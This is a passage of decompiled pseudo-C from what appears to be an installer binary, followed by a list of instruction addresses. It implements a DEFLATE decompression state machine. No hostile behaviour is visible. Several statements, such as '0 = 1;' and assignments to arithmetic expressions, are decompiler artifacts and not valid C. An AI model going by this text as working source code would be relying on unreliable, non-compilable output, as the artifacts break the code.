                                                            												goto L180;
                                                            											}
                                                            											L123:
                                                            											__esi[2] = __ecx;
                                                            											__esi[3] = __eax;
                                                            											 *__esi = 4;
                                                            											goto L180;
                                                            										case 4:
                                                            											L126:
                                                            											__eax = __esi[2];
                                                            											while(1) {
                                                            												L129:
                                                            												__eflags = __ebx - __eax;
                                                            												if(__ebx >= __eax) {
                                                            													break;
                                                            												}
                                                            												L127:
                                                            												__eflags =  *(__ebp - 0x34);
                                                            												if( *(__ebp - 0x34) == 0) {
                                                            													goto L182;
                                                            												}
                                                            												L128:
                                                            												__ecx =  *(__ebp - 0x38);
                                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                            												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                            												__ecx = __ebx;
                                                            												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                            												__ebx = __ebx + 8;
                                                            												__eflags = __ebx;
                                                            											}
                                                            											L130:
                                                            											 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                            											__esi[3] = __esi[3] + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                            											__ecx = __eax;
                                                            											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                            											__ebx = __ebx - __eax;
                                                            											__eflags = __ebx;
                                                            											 *__esi = 5;
                                                            											goto L131;
                                                            										case 5:
                                                            											L131:
                                                            											__eax =  *(__ebp - 0x30);
                                                            											__edx = __esi[3];
                                                            											__eax = __eax - __esi;
                                                            											__ecx = __eax - __esi - 0x1ba0;
                                                            											__eflags = __eax - __esi - 0x1ba0 - __edx;
                                                            											if(__eax - __esi - 0x1ba0 >= __edx) {
                                                            												__ecx = __eax;
                                                            												__ecx = __eax - __edx;
                                                            												__eflags = __ecx;
                                                            											} else {
                                                            												__esi[0x26e8] = __esi[0x26e8] - __edx;
                                                            												__ecx = __esi[0x26e8] - __edx - __esi;
                                                            												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                                                            											}
                                                            											__eflags = __esi[1];
                                                            											 *(__ebp - 0x20) = __ecx;
                                                            											if(__esi[1] != 0) {
                                                            												L135:
                                                            												__edi =  *(__ebp - 0x2c);
                                                            												do {
                                                            													L136:
                                                            													__eflags = __edi;
                                                            													if(__edi != 0) {
                                                            														goto L152;
                                                            													}
                                                            													L137:
                                                            													__edi = __esi[0x26e8];
                                                            													__eflags = __eax - __edi;
                                                            													if(__eax != __edi) {
                                                            														L143:
                                                            														__esi[0x26ea] = __eax;
                                                            														__eax = E00407217( *((intOrPtr*)(__ebp + 8)));
                                                            														__eax = __esi[0x26ea];
                                                            														__ecx = __esi[0x26e9];
                                                            														__eflags = __eax - __ecx;
                                                            														 *(__ebp - 0x30) = __eax;
                                                            														if(__eax >= __ecx) {
                                                            															__edi = __esi[0x26e8];
                                                            															__edi = __esi[0x26e8] - __eax;
                                                            															__eflags = __edi;
                                                            														} else {
                                                            															__ecx = __ecx - __eax;
                                                            															__edi = __ecx - __eax - 1;
                                                            														}
                                                            														__edx = __esi[0x26e8];
                                                            														__eflags = __eax - __edx;
                                                            														 *(__ebp - 8) = __edx;
                                                            														if(__eax == __edx) {
                                                            															__edx =  &(__esi[0x6e8]);
                                                            															__eflags = __ecx - __edx;
                                                            															if(__ecx != __edx) {
                                                            																__eax = __edx;
                                                            																__eflags = __eax - __ecx;
                                                            																 *(__ebp - 0x30) = __eax;
                                                            																if(__eax >= __ecx) {
                                                            																	__edi =  *(__ebp - 8);
                                                            																	__edi =  *(__ebp - 8) - __eax;
                                                            																	__eflags = __edi;
                                                            																} else {
                                                            																	__ecx = __ecx - __eax;
                                                            																	__edi = __ecx;
                                                            																}
                                                            															}
                                                            														}
                                                            														__eflags = __edi;
                                                            														if(__edi == 0) {
                                                            															goto L183;
                                                            														} else {
                                                            															goto L152;
                                                            														}
                                                            													}
                                                            													L138:
                                                            													__ecx = __esi[0x26e9];
                                                            													__edx =  &(__esi[0x6e8]);
                                                            													__eflags = __ecx - __edx;
                                                            													if(__ecx == __edx) {
                                                            														goto L143;
                                                            													}
                                                            													L139:
                                                            													__eax = __edx;
                                                            													__eflags = __eax - __ecx;
                                                            													if(__eax >= __ecx) {
                                                            														__edi = __edi - __eax;
                                                            														__eflags = __edi;
                                                            													} else {
                                                            														__ecx = __ecx - __eax;
                                                            														__edi = __ecx;
                                                            													}
                                                            													__eflags = __edi;
                                                            													if(__edi == 0) {
                                                            														goto L143;
                                                            													}
                                                            													L152:
                                                            													__ecx =  *(__ebp - 0x20);
                                                            													 *__eax =  *__ecx;
                                                            													__eax = __eax + 1;
                                                            													__ecx = __ecx + 1;
                                                            													__edi = __edi - 1;
                                                            													__eflags = __ecx - __esi[0x26e8];
                                                            													 *(__ebp - 0x30) = __eax;
                                                            													 *(__ebp - 0x20) = __ecx;
                                                            													 *(__ebp - 0x2c) = __edi;
                                                            													if(__ecx == __esi[0x26e8]) {
                                                            														__ecx =  &(__esi[0x6e8]);
                                                            														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
                                                            													}
                                                            													_t357 =  &(__esi[1]);
                                                            													 *_t357 = __esi[1] - 1;
                                                            													__eflags =  *_t357;
                                                            												} while ( *_t357 != 0);
                                                            											}
                                                            											goto L23;
                                                            										case 6:
                                                            											L156:
                                                            											__eax =  *(__ebp - 0x2c);
                                                            											__edi =  *(__ebp - 0x30);
                                                            											__eflags = __eax;
                                                            											if(__eax != 0) {
                                                            												L172:
                                                            												__cl = __esi[2];
                                                            												 *__edi = __cl;
                                                            												__edi = __edi + 1;
                                                            												__eax = __eax - 1;
                                                            												 *(__ebp - 0x30) = __edi;
                                                            												 *(__ebp - 0x2c) = __eax;
                                                            												goto L23;
                                                            											}
                                                            											L157:
                                                            											__ecx = __esi[0x26e8];
                                                            											__eflags = __edi - __ecx;
                                                            											if(__edi != __ecx) {
                                                            												L163:
                                                            												__esi[0x26ea] = __edi;
                                                            												__eax = E00407217( *((intOrPtr*)(__ebp + 8)));
                                                            												__edi = __esi[0x26ea];
                                                            												__ecx = __esi[0x26e9];
                                                            												__eflags = __edi - __ecx;
                                                            												 *(__ebp - 0x30) = __edi;
                                                            												if(__edi >= __ecx) {
                                                            													__eax = __esi[0x26e8];
                                                            													__eax = __esi[0x26e8] - __edi;
                                                            													__eflags = __eax;
                                                            												} else {
                                                            													__ecx = __ecx - __edi;
                                                            													__eax = __ecx - __edi - 1;
                                                            												}
                                                            												__edx = __esi[0x26e8];
                                                            												__eflags = __edi - __edx;
                                                            												 *(__ebp - 8) = __edx;
                                                            												if(__edi == __edx) {
                                                            													__edx =  &(__esi[0x6e8]);
                                                            													__eflags = __ecx - __edx;
                                                            													if(__ecx != __edx) {
                                                            														__edi = __edx;
                                                            														__eflags = __edi - __ecx;
                                                            														 *(__ebp - 0x30) = __edi;
                                                            														if(__edi >= __ecx) {
                                                            															__eax =  *(__ebp - 8);
                                                            															__eax =  *(__ebp - 8) - __edi;
                                                            															__eflags = __eax;
                                                            														} else {
                                                            															__ecx = __ecx - __edi;
                                                            															__eax = __ecx;
                                                            														}
                                                            													}
                                                            												}
                                                            												__eflags = __eax;
                                                            												if(__eax == 0) {
                                                            													goto L183;
                                                            												} else {
                                                            													goto L172;
                                                            												}
                                                            											}
                                                            											L158:
                                                            											__eax = __esi[0x26e9];
                                                            											__edx =  &(__esi[0x6e8]);
                                                            											__eflags = __eax - __edx;
                                                            											if(__eax == __edx) {
                                                            												goto L163;
                                                            											}
                                                            											L159:
                                                            											__edi = __edx;
                                                            											__eflags = __edi - __eax;
                                                            											if(__edi >= __eax) {
                                                            												__ecx = __ecx - __edi;
                                                            												__eflags = __ecx;
                                                            												__eax = __ecx;
                                                            											} else {
                                                            												__eax = __eax - __edi;
                                                            												__eax = __eax - 1;
                                                            											}
                                                            											__eflags = __eax;
                                                            											if(__eax != 0) {
                                                            												goto L172;
                                                            											} else {
                                                            												goto L163;
                                                            											}
                                                            										case 7:
                                                            											L173:
                                                            											__eflags = __ebx - 7;
                                                            											if(__ebx > 7) {
                                                            												__ebx = __ebx - 8;
                                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                                                            												_t380 = __ebp - 0x38;
                                                            												 *_t380 =  *(__ebp - 0x38) - 1;
                                                            												__eflags =  *_t380;
                                                            											}
                                                            											goto L175;
                                                            										case 8:
                                                            											L4:
                                                            											while(_t425 < 3) {
                                                            												if( *(_t448 - 0x34) == 0) {
                                                            													goto L182;
                                                            												} else {
                                                            													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
                                                            													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
                                                            													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
                                                            													_t425 = _t425 + 8;
                                                            													continue;
                                                            												}
                                                            											}
                                                            											_t425 = _t425 - 3;
                                                            											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
                                                            											_t406 =  *(_t448 - 0x40) & 0x00000007;
                                                            											asm("sbb ecx, ecx");
                                                            											_t408 = _t406 >> 1;
                                                            											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
                                                            											if(_t408 == 0) {
                                                            												L24:
                                                            												 *_t446 = 9;
                                                            												_t436 = _t425 & 0x00000007;
                                                            												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
                                                            												_t425 = _t425 - _t436;
                                                            												goto L180;
                                                            											}
                                                            											L6:
                                                            											_t411 = _t408 - 1;
                                                            											if(_t411 == 0) {
                                                            												L13:
                                                            												__eflags =  *0x44a3a8;
                                                            												if( *0x44a3a8 != 0) {
                                                            													L22:
                                                            													_t412 =  *0x40a42c; // 0x9
                                                            													_t446[4] = _t412;
                                                            													_t413 =  *0x40a430; // 0x5
                                                            													_t446[4] = _t413;
                                                            													_t414 =  *0x449224; // 0x0
                                                            													_t446[5] = _t414;
                                                            													_t415 =  *0x449220; // 0x0
                                                            													_t446[6] = _t415;
                                                            													L23:
                                                            													 *_t446 =  *_t446 & 0x00000000;
                                                            													goto L180;
                                                            												} else {
                                                            													_t26 = _t448 - 8;
                                                            													 *_t26 =  *(_t448 - 8) & 0x00000000;
                                                            													__eflags =  *_t26;
                                                            													_t416 = 0x449228;
                                                            													goto L15;
                                                            													L20:
                                                            													 *_t416 = _t438;
                                                            													_t416 = _t416 + 4;
                                                            													__eflags = _t416 - 0x4496a8;
                                                            													if(_t416 < 0x4496a8) {
                                                            														L15:
                                                            														__eflags = _t416 - 0x449464;
                                                            														_t438 = 8;
                                                            														if(_t416 > 0x449464) {
                                                            															__eflags = _t416 - 0x449628;
                                                            															if(_t416 >= 0x449628) {
                                                            																__eflags = _t416 - 0x449688;
                                                            																if(_t416 < 0x449688) {
                                                            																	_t438 = 7;
                                                            																}
                                                            															} else {
                                                            																_t438 = 9;
                                                            															}
                                                            														}
                                                            														goto L20;
                                                            													} else {
                                                            														E0040727F(0x449228, 0x120, 0x101, 0x40841c, 0x40845c, 0x449224, 0x40a42c, 0x449b28, _t448 - 8);
                                                            														_push(0x1e);
                                                            														_pop(_t440);
                                                            														_push(5);
                                                            														_pop(_t419);
                                                            														memset(0x449228, _t419, _t440 << 2);
                                                            														_t450 = _t450 + 0xc;
                                                            														_t442 = 0x449228 + _t440;
                                                            														E0040727F(0x449228, 0x1e, 0, 0x40849c, 0x4084d8, 0x449220, 0x40a430, 0x449b28, _t448 - 8);
                                                            														 *0x44a3a8 =  *0x44a3a8 + 1;
                                                            														__eflags =  *0x44a3a8;
                                                            														goto L22;
                                                            													}
                                                            												}
                                                            											}
                                                            											L7:
                                                            											_t423 = _t411 - 1;
                                                            											if(_t423 == 0) {
                                                            												 *_t446 = 0xb;
                                                            												goto L180;
                                                            											}
                                                            											L8:
                                                            											if(_t423 != 1) {
                                                            												goto L180;
                                                            											}
                                                            											goto L9;
                                                            										case 9:
                                                            											while(1) {
                                                            												L27:
                                                            												__eflags = __ebx - 0x20;
                                                            												if(__ebx >= 0x20) {
                                                            													break;
                                                            												}
                                                            												L25:
                                                            												__eflags =  *(__ebp - 0x34);
                                                            												if( *(__ebp - 0x34) == 0) {
                                                            													goto L182;
                                                            												}
                                                            												L26:
                                                            												__eax =  *(__ebp - 0x38);
                                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                            												__ecx = __ebx;
                                                            												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                            												__ebx = __ebx + 8;
                                                            												__eflags = __ebx;
                                                            											}
                                                            											L28:
                                                            											__eax =  *(__ebp - 0x40);
                                                            											__ebx = 0;
                                                            											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                                                            											 *(__ebp - 0x40) = 0;
                                                            											__eflags = __eax;
                                                            											__esi[1] = __eax;
                                                            											if(__eax == 0) {
                                                            												goto L53;
                                                            											}
                                                            											L29:
                                                            											_push(0xa);
                                                            											_pop(__eax);
                                                            											goto L54;
                                                            										case 0xa:
                                                            											L30:
                                                            											__eflags =  *(__ebp - 0x34);
                                                            											if( *(__ebp - 0x34) == 0) {
                                                            												goto L182;
                                                            											}
                                                            											L31:
                                                            											__eax =  *(__ebp - 0x2c);
                                                            											__eflags = __eax;
                                                            											if(__eax != 0) {
                                                            												L48:
                                                            												__eflags = __eax -  *(__ebp - 0x34);
                                                            												if(__eax >=  *(__ebp - 0x34)) {
                                                            													__eax =  *(__ebp - 0x34);
                                                            												}
                                                            												__ecx = __esi[1];
                                                            												__eflags = __ecx - __eax;
                                                            												__edi = __ecx;
                                                            												if(__ecx >= __eax) {
                                                            													__edi = __eax;
                                                            												}
                                                            												__eax = E00405DA5( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                                                            												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                                                            												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                                                            												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                                                            												_t80 =  &(__esi[1]);
                                                            												 *_t80 = __esi[1] - __edi;
                                                            												__eflags =  *_t80;
                                                            												if( *_t80 == 0) {
                                                            													L53:
                                                            													__eax = __esi[0x145];
                                                            													L54:
                                                            													 *__esi = __eax;
                                                            												}
                                                            												goto L180;
                                                            											}
                                                            											L32:
                                                            											__ecx = __esi[0x26e8];
                                                            											__edx =  *(__ebp - 0x30);
                                                            											__eflags = __edx - __ecx;
                                                            											if(__edx != __ecx) {
                                                            												L38:
                                                            												__esi[0x26ea] = __edx;
                                                            												__eax = E00407217( *((intOrPtr*)(__ebp + 8)));
                                                            												__edx = __esi[0x26ea];
                                                            												__ecx = __esi[0x26e9];
                                                            												__eflags = __edx - __ecx;
                                                            												 *(__ebp - 0x30) = __edx;
                                                            												if(__edx >= __ecx) {
                                                            													__eax = __esi[0x26e8];
                                                            													__eax = __esi[0x26e8] - __edx;
                                                            													__eflags = __eax;
                                                            												} else {
                                                            													__ecx = __ecx - __edx;
                                                            													__eax = __ecx - __edx - 1;
                                                            												}
                                                            												__edi = __esi[0x26e8];
                                                            												 *(__ebp - 0x2c) = __eax;
                                                            												__eflags = __edx - __edi;
                                                            												if(__edx == __edi) {
                                                            													__edx =  &(__esi[0x6e8]);
                                                            													__eflags = __edx - __ecx;
                                                            													if(__eflags != 0) {
                                                            														 *(__ebp - 0x30) = __edx;
                                                            														if(__eflags >= 0) {
                                                            															__edi = __edi - __edx;
                                                            															__eflags = __edi;
                                                            															__eax = __edi;
                                                            														} else {
                                                            															__ecx = __ecx - __edx;
                                                            															__eax = __ecx;
                                                            														}
                                                            														 *(__ebp - 0x2c) = __eax;
                                                            													}
                                                            												}
                                                            												__eflags = __eax;
                                                            												if(__eax == 0) {
                                                            													goto L183;
                                                            												} else {
                                                            													goto L48;
                                                            												}
                                                            											}
                                                            											L33:
                                                            											__eax = __esi[0x26e9];
                                                            											__edi =  &(__esi[0x6e8]);
                                                            											__eflags = __eax - __edi;
                                                            											if(__eax == __edi) {
                                                            												goto L38;
                                                            											}
                                                            											L34:
                                                            											__edx = __edi;
                                                            											__eflags = __edx - __eax;
                                                            											 *(__ebp - 0x30) = __edx;
                                                            											if(__edx >= __eax) {
                                                            												__ecx = __ecx - __edx;
                                                            												__eflags = __ecx;
                                                            												__eax = __ecx;
                                                            											} else {
                                                            												__eax = __eax - __edx;
                                                            												__eax = __eax - 1;
                                                            											}
                                                            											__eflags = __eax;
                                                            											 *(__ebp - 0x2c) = __eax;
                                                            											if(__eax != 0) {
                                                            												goto L48;
                                                            											} else {
                                                            												goto L38;
                                                            											}
                                                            										case 0xb:
                                                            											goto L56;
                                                            										case 0xc:
                                                            											L60:
                                                            											__esi[1] = __esi[1] >> 0xa;
                                                            											__eax = (__esi[1] >> 0xa) + 4;
                                                            											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                            												goto L68;
                                                            											}
                                                            											goto L61;
                                                            										case 0xd:
                                                            											while(1) {
                                                            												L93:
                                                            												__eax = __esi[1];
                                                            												__ecx = __esi[2];
                                                            												__edx = __eax;
                                                            												__eax = __eax & 0x0000001f;
                                                            												__edx = __edx >> 5;
                                                            												__eax = __edx + __eax + 0x102;
                                                            												__eflags = __esi[2] - __eax;
                                                            												if(__esi[2] >= __eax) {
                                                            													break;
                                                            												}
                                                            												L73:
                                                            												__eax = __esi[0x143];
                                                            												while(1) {
                                                            													L76:
                                                            													__eflags = __ebx - __eax;
                                                            													if(__ebx >= __eax) {
                                                            														break;
                                                            													}
                                                            													L74:
                                                            													__eflags =  *(__ebp - 0x34);
                                                            													if( *(__ebp - 0x34) == 0) {
                                                            														goto L182;
                                                            													}
                                                            													L75:
                                                            													__ecx =  *(__ebp - 0x38);
                                                            													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                            													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                            													__ecx = __ebx;
                                                            													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                            													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                            													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                            													__ebx = __ebx + 8;
                                                            													__eflags = __ebx;
                                                            												}
                                                            												L77:
                                                            												__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
                                                            												__eax = __eax &  *(__ebp - 0x40);
                                                            												__ecx = __esi[0x144];
                                                            												__eax = __esi[0x144] + __eax * 4;
                                                            												__edx =  *(__eax + 1) & 0x000000ff;
                                                            												__eax =  *(__eax + 2) & 0x0000ffff;
                                                            												__eflags = __eax - 0x10;
                                                            												 *(__ebp - 0x14) = __eax;
                                                            												if(__eax >= 0x10) {
                                                            													L79:
                                                            													__eflags = __eax - 0x12;
                                                            													if(__eax != 0x12) {
                                                            														__eax = __eax + 0xfffffff2;
                                                            														 *(__ebp - 8) = 3;
                                                            													} else {
                                                            														_push(7);
                                                            														 *(__ebp - 8) = 0xb;
                                                            														_pop(__eax);
                                                            													}
                                                            													while(1) {
                                                            														L84:
                                                            														__ecx = __eax + __edx;
                                                            														__eflags = __ebx - __eax + __edx;
                                                            														if(__ebx >= __eax + __edx) {
                                                            															break;
                                                            														}
                                                            														L82:
                                                            														__eflags =  *(__ebp - 0x34);
                                                            														if( *(__ebp - 0x34) == 0) {
                                                            															goto L182;
                                                            														}
                                                            														L83:
                                                            														__ecx =  *(__ebp - 0x38);
                                                            														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                            														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                            														__ecx = __ebx;
                                                            														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                            														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                            														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                            														__ebx = __ebx + 8;
                                                            														__eflags = __ebx;
                                                            													}
                                                            													L85:
                                                            													__ecx = __edx;
                                                            													__ebx = __ebx - __edx;
                                                            													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                            													 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                            													__edx =  *(__ebp - 8);
                                                            													__ebx = __ebx - __eax;
                                                            													__edx =  *(__ebp - 8) + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                            													__ecx = __eax;
                                                            													__eax = __esi[1];
                                                            													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                            													__ecx = __esi[2];
                                                            													__eax = __eax >> 5;
                                                            													__edi = __eax >> 0x00000005 & 0x0000001f;
                                                            													__eax = __eax & 0x0000001f;
                                                            													__eax = __edi + __eax + 0x102;
                                                            													__edi = __edx + __ecx;
                                                            													__eflags = __edx + __ecx - __eax;
                                                            													if(__edx + __ecx > __eax) {
                                                            														goto L9;
                                                            													}
                                                            													L86:
                                                            													__eflags =  *(__ebp - 0x14) - 0x10;
                                                            													if( *(__ebp - 0x14) != 0x10) {
                                                            														L89:
                                                            														__edi = 0;
                                                            														__eflags = 0;
                                                            														L90:
                                                            														__eax = __esi + 0xc + __ecx * 4;
                                                            														do {
                                                            															L91:
                                                            															 *__eax = __edi;
                                                            															__ecx = __ecx + 1;
                                                            															__eax = __eax + 4;
                                                            															__edx = __edx - 1;
                                                            															__eflags = __edx;
                                                            														} while (__edx != 0);
                                                            														__esi[2] = __ecx;
                                                            														continue;
                                                            													}
                                                            													L87:
                                                            													__eflags = __ecx - 1;
                                                            													if(__ecx < 1) {
                                                            														goto L9;
                                                            													}
                                                            													L88:
                                                            													__edi =  *(__esi + 8 + __ecx * 4);
                                                            													goto L90;
                                                            												}
                                                            												L78:
                                                            												__ecx = __edx;
                                                            												__ebx = __ebx - __edx;
                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                            												__ecx = __esi[2];
                                                            												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                                                            												__esi[2] = __esi[2] + 1;
                                                            											}
                                                            											L94:
                                                            											__eax = __esi[1];
                                                            											__esi[0x144] = __esi[0x144] & 0x00000000;
                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                                                            											__edi = __eax;
                                                            											__eax = __eax >> 5;
                                                            											__edi = __edi & 0x0000001f;
                                                            											__ecx = 0x101;
                                                            											__eax = __eax & 0x0000001f;
                                                            											__edi = __edi + 0x101;
                                                            											__eax = __eax + 1;
                                                            											__edx = __ebp - 0xc;
                                                            											 *(__ebp - 0x14) = __eax;
                                                            											 &(__esi[0x148]) = __ebp - 4;
                                                            											 *(__ebp - 4) = 9;
                                                            											__ebp - 0x18 =  &(__esi[3]);
                                                            											 *(__ebp - 0x10) = 6;
                                                            											__eax = E0040727F( &(__esi[3]), __edi, 0x101, 0x40841c, 0x40845c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                                                            											__eflags =  *(__ebp - 4);
                                                            											if( *(__ebp - 4) == 0) {
                                                            												__eax = __eax | 0xffffffff;
                                                            												__eflags = __eax;
                                                            											}
                                                            											__eflags = __eax;
                                                            											if(__eax != 0) {
                                                            												goto L9;
                                                            											} else {
                                                            												L97:
                                                            												__ebp - 0xc =  &(__esi[0x148]);
                                                            												__ebp - 0x10 = __ebp - 0x1c;
                                                            												__eax = __esi + 0xc + __edi * 4;
                                                            												__eax = E0040727F(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40849c, 0x4084d8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                                                            												__eflags = __eax;
                                                            												if(__eax != 0) {
                                                            													goto L9;
                                                            												}
                                                            												L98:
                                                            												__eax =  *(__ebp - 0x10);
                                                            												__eflags =  *(__ebp - 0x10);
                                                            												if( *(__ebp - 0x10) != 0) {
                                                            													L100:
                                                            													__cl =  *(__ebp - 4);
                                                            													 *__esi =  *__esi & 0x00000000;
                                                            													__eflags =  *__esi;
                                                            													__esi[4] = __al;
                                                            													__eax =  *(__ebp - 0x18);
                                                            													__esi[5] =  *(__ebp - 0x18);
                                                            													__eax =  *(__ebp - 0x1c);
                                                            													__esi[4] = __cl;
                                                            													__esi[6] =  *(__ebp - 0x1c);
                                                            													goto L101;
                                                            												}
                                                            												L99:
                                                            												__eflags = __edi - 0x101;
                                                            												if(__edi > 0x101) {
                                                            													goto L9;
                                                            												}
                                                            												goto L100;
                                                            											}
                                                            										case 0xe:
                                                            											goto L9;
                                                            										case 0xf:
                                                            											L175:
                                                            											__eax =  *(__ebp - 0x30);
                                                            											__esi[0x26ea] =  *(__ebp - 0x30);
                                                            											__eax = E00407217( *((intOrPtr*)(__ebp + 8)));
                                                            											__ecx = __esi[0x26ea];
                                                            											__edx = __esi[0x26e9];
                                                            											__eflags = __ecx - __edx;
                                                            											 *(__ebp - 0x30) = __ecx;
                                                            											if(__ecx >= __edx) {
                                                            												__eax = __esi[0x26e8];
                                                            												__eax = __esi[0x26e8] - __ecx;
                                                            												__eflags = __eax;
                                                            											} else {
                                                            												__edx = __edx - __ecx;
                                                            												__eax = __edx - __ecx - 1;
                                                            											}
                                                            											__eflags = __ecx - __edx;
                                                            											 *(__ebp - 0x2c) = __eax;
                                                            											if(__ecx != __edx) {
                                                            												L183:
                                                            												__edi = 0;
                                                            												goto L10;
                                                            											} else {
                                                            												L179:
                                                            												__eax = __esi[0x145];
                                                            												__eflags = __eax - 8;
                                                            												 *__esi = __eax;
                                                            												if(__eax != 8) {
                                                            													L184:
                                                            													0 = 1;
                                                            													goto L10;
                                                            												}
                                                            												goto L180;
                                                            											}
                                                            									}
                                                            								}
                                                            								L181:
                                                            								goto L9;
                                                            							}
                                                            							L70:
                                                            							if( *__edi == __eax) {
                                                            								goto L72;
                                                            							}
                                                            							L71:
                                                            							__esi[2] = __esi[2] & __eax;
                                                            							 *__esi = 0xd;
                                                            							goto L93;
                                                            						}
                                                            					}
                                                            				}
                                                            				L182:
                                                            				_t443 = 0;
                                                            				_t446[0x147] =  *(_t448 - 0x40);
                                                            				_t446[0x146] = _t425;
                                                            				( *(_t448 + 8))[1] = 0;
                                                            				goto L11;
                                                            			}









                                                            0x00406fa2
                                                            0x00406fb7
                                                            0x00406fb9
                                                            0x00406fb9
                                                            0x00406fa4
                                                            0x00406faa
                                                            0x00406fac
                                                            0x00406fae
                                                            0x00406fae
                                                            0x00406fbb
                                                            0x00406fbf
                                                            0x00406fc2
                                                            0x00406fc8
                                                            0x00406fc8
                                                            0x00406fcb
                                                            0x00406fcb
                                                            0x00406fcb
                                                            0x00406fcd
                                                            0x00000000
                                                            0x00000000
                                                            0x00406fd3
                                                            0x00406fd3
                                                            0x00406fd9
                                                            0x00406fdb
                                                            0x00407000
                                                            0x00407003
                                                            0x00407009
                                                            0x0040700e
                                                            0x00407014
                                                            0x0040701a
                                                            0x0040701c
                                                            0x0040701f
                                                            0x00407028
                                                            0x0040702e
                                                            0x0040702e
                                                            0x00407021
                                                            0x00407023
                                                            0x00407025
                                                            0x00407025
                                                            0x00407030
                                                            0x00407036
                                                            0x00407038
                                                            0x0040703b
                                                            0x0040703d
                                                            0x00407043
                                                            0x00407045
                                                            0x00407047
                                                            0x00407049
                                                            0x0040704b
                                                            0x0040704e
                                                            0x00407057
                                                            0x0040705a
                                                            0x0040705a
                                                            0x00407050
                                                            0x00407050
                                                            0x00407053
                                                            0x00407053
                                                            0x0040704e
                                                            0x00407045
                                                            0x0040705c
                                                            0x0040705e
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040705e
                                                            0x00406fdd
                                                            0x00406fdd
                                                            0x00406fe3
                                                            0x00406fe9
                                                            0x00406feb
                                                            0x00000000
                                                            0x00000000
                                                            0x00406fed
                                                            0x00406fed
                                                            0x00406fef
                                                            0x00406ff1
                                                            0x00406ffa
                                                            0x00406ffa
                                                            0x00406ff3
                                                            0x00406ff3
                                                            0x00406ff6
                                                            0x00406ff6
                                                            0x00406ffc
                                                            0x00406ffe
                                                            0x00000000
                                                            0x00000000
                                                            0x00407064
                                                            0x00407064
                                                            0x00407069
                                                            0x0040706b
                                                            0x0040706c
                                                            0x0040706d
                                                            0x0040706e
                                                            0x00407074
                                                            0x00407077
                                                            0x0040707a
                                                            0x0040707d
                                                            0x0040707f
                                                            0x00407085
                                                            0x00407085
                                                            0x00407088
                                                            0x00407088
                                                            0x00407088
                                                            0x00407088
                                                            0x00407091
                                                            0x00000000
                                                            0x00000000
                                                            0x00407096
                                                            0x00407096
                                                            0x00407099
                                                            0x0040709c
                                                            0x0040709e
                                                            0x00407135
                                                            0x00407135
                                                            0x00407138
                                                            0x0040713a
                                                            0x0040713b
                                                            0x0040713c
                                                            0x0040713f
                                                            0x00000000
                                                            0x0040713f
                                                            0x004070a4
                                                            0x004070a4
                                                            0x004070aa
                                                            0x004070ac
                                                            0x004070d1
                                                            0x004070d4
